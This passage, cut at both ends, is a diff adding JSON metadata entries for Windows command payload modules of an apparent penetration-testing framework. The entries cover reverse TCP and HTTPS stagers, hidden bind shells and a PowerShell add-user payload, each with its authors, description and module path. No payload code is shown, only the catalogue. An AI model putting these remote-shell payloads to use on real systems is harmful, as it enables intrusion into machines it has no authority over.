payload from an HTTPS server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/vncinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/vncinject/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/https/x64/vncinject/reverse_tcp_uuid": { + "name": "HTTPS Fetch, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/https/x64/vncinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/vncinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + 
"session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/vncinject/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/https/x64/vncinject/reverse_winhttp": { + "name": "HTTPS Fetch, Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/https/x64/vncinject/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/vncinject/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/vncinject/reverse_winhttp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_cmd/windows/https/x64/vncinject/reverse_winhttps": { + "name": "HTTPS Fetch, Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/https/x64/vncinject/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + 
"description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/vncinject/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/vncinject/reverse_winhttps", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_cmd/windows/jjs_reverse_tcp": { + "name": "Windows Shell, Reverse TCP (via jjs)", + "fullname": "payload/cmd/windows/jjs_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "conerpirate", + "bcoles " + ], + "description": "Connect back and create a command shell via jjs", + "references": [ + "URL-https://gtfobins.github.io/gtfobins/jjs/", + "URL-https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/", + "URL-https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/windows/jjs_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "cmd/windows/jjs_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + 
"session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/powershell/adduser": { + "name": "Powershell Exec", + "fullname": "payload/cmd/windows/powershell/adduser", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "hdm ", + "Chris John Riley", + "vlad902 ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/adduser", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/adduser", + "staged": false + }, + "payload_cmd/windows/powershell/custom/bind_hidden_ipknock_tcp": { + "name": "Powershell Exec, Windows shellcode stage, Hidden Bind Ipknock TCP Stager", + "fullname": "payload/cmd/windows/powershell/custom/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. 
The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/bind_hidden_ipknock_tcp", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_cmd/windows/powershell/custom/bind_hidden_tcp": { + "name": "Powershell Exec, Windows shellcode stage, Hidden Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/custom/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/bind_hidden_tcp", + "check": false, + "post_auth": false, + 
"default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/bind_hidden_tcp", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_cmd/windows/powershell/custom/bind_ipv6_tcp": { + "name": "Powershell Exec, Windows shellcode stage, Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/custom/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "skape ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_cmd/windows/powershell/custom/bind_ipv6_tcp_uuid": { + "name": "Powershell Exec, Windows shellcode stage, Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/custom/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "OJ Reeves" 
+ ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/powershell/custom/bind_named_pipe": { + "name": "Powershell Exec, Windows shellcode stage, Windows x86 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/powershell/custom/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "UserExistsError" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + 
"adapted_refname": "windows/custom/bind_named_pipe", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_cmd/windows/powershell/custom/bind_nonx_tcp": { + "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/custom/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "vlad902 " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection (No NX)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/bind_nonx_tcp", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_nonx_tcp" + }, + "payload_cmd/windows/powershell/custom/bind_tcp": { + "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/custom/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "skape ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + 
"autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/bind_tcp", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_tcp" + }, + "payload_cmd/windows/powershell/custom/bind_tcp_rc4": { + "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/custom/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_cmd/windows/powershell/custom/bind_tcp_uuid": { + "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager with UUID 
Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/custom/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_cmd/windows/powershell/custom/find_tag": { + "name": "Powershell Exec, Windows shellcode stage, Find Tag Ordinal Stager", + "fullname": "payload/cmd/windows/powershell/custom/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nUse an established connection", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/find_tag", + "check": false, + "post_auth": 
false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/find_tag", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/findtag_ord" + }, + "payload_cmd/windows/powershell/custom/reverse_http": { + "name": "Powershell Exec, Windows shellcode stage, Windows Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/powershell/custom/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows wininet)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/reverse_http", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_http" + }, + "payload_cmd/windows/powershell/custom/reverse_http_proxy_pstore": { + "name": "Powershell Exec, Windows shellcode stage, Reverse HTTP Stager Proxy", + "fullname": "payload/cmd/windows/powershell/custom/reverse_http_proxy_pstore", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm " + ], + "description": "Execute an x86 payload from a command via 
PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/reverse_http_proxy_pstore", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/reverse_http_proxy_pstore", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_http_proxy_pstore" + }, + "payload_cmd/windows/powershell/custom/reverse_https": { + "name": "Powershell Exec, Windows shellcode stage, Windows Reverse HTTPS Stager (wininet)", + "fullname": "payload/cmd/windows/powershell/custom/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows wininet)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/reverse_https", + "staged": true, + 
"stage_refname": "windows/custom", + "stager_refname": "windows/reverse_https" + }, + "payload_cmd/windows/powershell/custom/reverse_ipv6_tcp": { + "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (IPv6)", + "fullname": "payload/cmd/windows/powershell/custom/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "skape ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker over IPv6", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/reverse_ipv6_tcp", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_cmd/windows/powershell/custom/reverse_named_pipe": { + "name": "Powershell Exec, Windows shellcode stage, Windows x86 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/powershell/custom/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + 
"autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_named_pipe" + }, + "payload_cmd/windows/powershell/custom/reverse_nonx_tcp": { + "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/custom/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "vlad902 " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker (No NX)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/reverse_nonx_tcp", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_cmd/windows/powershell/custom/reverse_ord_tcp": { + "name": "Powershell Exec, Windows shellcode stage, Reverse Ordinal TCP 
Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/custom/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "spoonm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/reverse_ord_tcp", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_cmd/windows/powershell/custom/reverse_tcp": { + "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager", + "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "skape ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/reverse_tcp", + "check": false, + "post_auth": false, + 
"default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/reverse_tcp", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_tcp" + }, + "payload_cmd/windows/powershell/custom/reverse_tcp_allports": { + "name": "Powershell Exec, Windows shellcode stage, Reverse All-Port TCP Stager", + "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "skape ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/reverse_tcp_allports", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_cmd/windows/powershell/custom/reverse_tcp_dns": { + "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (DNS)", + "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "skape ", + 
"sf ", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/custom/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/custom/reverse_tcp_dns", + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_cmd/windows/powershell/custom/reverse_tcp_rc4": { + "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm 